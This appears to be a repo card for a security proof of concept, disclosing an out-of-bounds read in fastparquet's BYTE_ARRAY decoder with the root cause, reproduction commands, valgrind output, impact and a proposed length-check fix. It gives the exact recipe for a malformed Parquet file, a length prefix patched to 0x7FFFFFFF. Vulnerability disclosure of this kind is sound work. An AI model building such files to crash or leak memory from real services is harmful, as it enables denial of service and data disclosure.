YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
fastparquet: out-of-bounds read in the BYTE_ARRAY (string) column decoder
This repo contains a proof-of-concept malicious Parquet file that triggers an out-of-bounds
read in fastparquet when the file is loaded, crashing the process (SIGSEGV) and potentially
disclosing adjacent heap memory.
Security PoC for a huntr Model File Format report ("Parquet"). The file is intentionally malformed and the repo is gated.
Affected
fastparquet, confirmed on 2026.5.0 (current); the vulnerable code is unchanged onmain.- Reachable from the documented read APIs:
fastparquet.ParquetFile(path).to_pandas()pandas.read_parquet(path, engine="fastparquet")
- Note:
pandas.read_parquetusespyarrowby default; fastparquet is used when selected viaengine="fastparquet"or when pyarrow is not installed.
Root cause
fastparquet/speedups.pyx, unpack_byte_array_arrow(). PLAIN-encoded BYTE_ARRAY values are a
4-byte little-endian length prefix followed by that many bytes. The decoder reads the length and
then advances/copies that many bytes without validating the length, or the running offset,
against the end of the input buffer:
speedups.c:21722reads the next value's 4-byte length prefix past the buffer.speedups.c:22042reads/copies the string bytes past the buffer.
The only loop guard is the value count, not the bytes consumed. A single oversized length walks the read pointer off the end of the allocation.
Proof of concept
poc.parquet is a valid 848-byte single-string-column Parquet whose first BYTE_ARRAY value has
its 4-byte length prefix patched from 7 to 0x7FFFFFFF. Loading it makes the decoder attempt to
read ~2 GiB starting inside a small heap block.
pip install fastparquet pandas
python make_poc.py # writes seed.parquet and poc.parquet
python verify.py # loads poc.parquet in a child process; reports the crash
Observed on fastparquet 2026.5.0 (Linux): the child process terminates with SIGSEGV (exit -11). Under valgrind:
Invalid read of size 1
at __pyx_pf_11fastparquet_8speedups_6unpack_byte_array_arrow (speedups.c:22042)
Address 0x... is 0 bytes after a block of size 286 alloc'd
Impact
Loading an untrusted .parquet through fastparquet triggers an out-of-bounds read in native
(Cython-compiled) code. At minimum this is a reliable crash / denial of service at file-read
time. Because the over-read bytes are copied into the returned string column values, it can also
disclose adjacent heap memory (information leak) for reads that do not immediately fault.
Fix
In unpack_byte_array_arrow (and unpack_byte_array), validate each value's length against the
remaining buffer size before reading the length prefix and before copying the data, e.g. reject
when src_pos + 4 > buflen or src_pos + 4 + length > buflen.